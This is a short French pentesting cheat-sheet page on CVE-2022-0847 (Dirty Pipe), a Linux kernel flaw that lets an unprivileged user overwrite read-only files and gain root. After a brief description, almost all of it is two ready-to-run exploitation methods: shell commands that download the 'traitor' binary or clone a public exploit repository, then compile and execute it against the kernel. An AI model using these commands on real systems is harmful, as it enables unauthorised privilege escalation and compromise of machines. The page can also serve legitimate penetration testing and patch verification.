CVE-2022-0847 (Dirty Pipe)
Dirty Pipe est une vulnérabilité du noyau Linux depuis la version 5.8 qui permet d'écraser des données dans des fichiers arbitraires en lecture seule. Cela conduit à une élévation des privilèges car les processus non privilégiés peuvent injecter du code dans les processus racine.
ressource: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Exploitation
Méthode 1
# Téléchargement de l'executable ELF
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
# Don des droits nécessaires à l'execution de l'executable
chmod 777 traitor-amd64
# Exploitation
./traitor-amd64 --exploit kernel:CVE-2022-0847
Méthode 2:
# Téléchargement du script
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
cd CVE-2022-0847-DirtyPipe-Exploit
./compile.sh
# Exploitation
./exploit
Dernière mise à jour
Cet article vous a-t-il été utile ?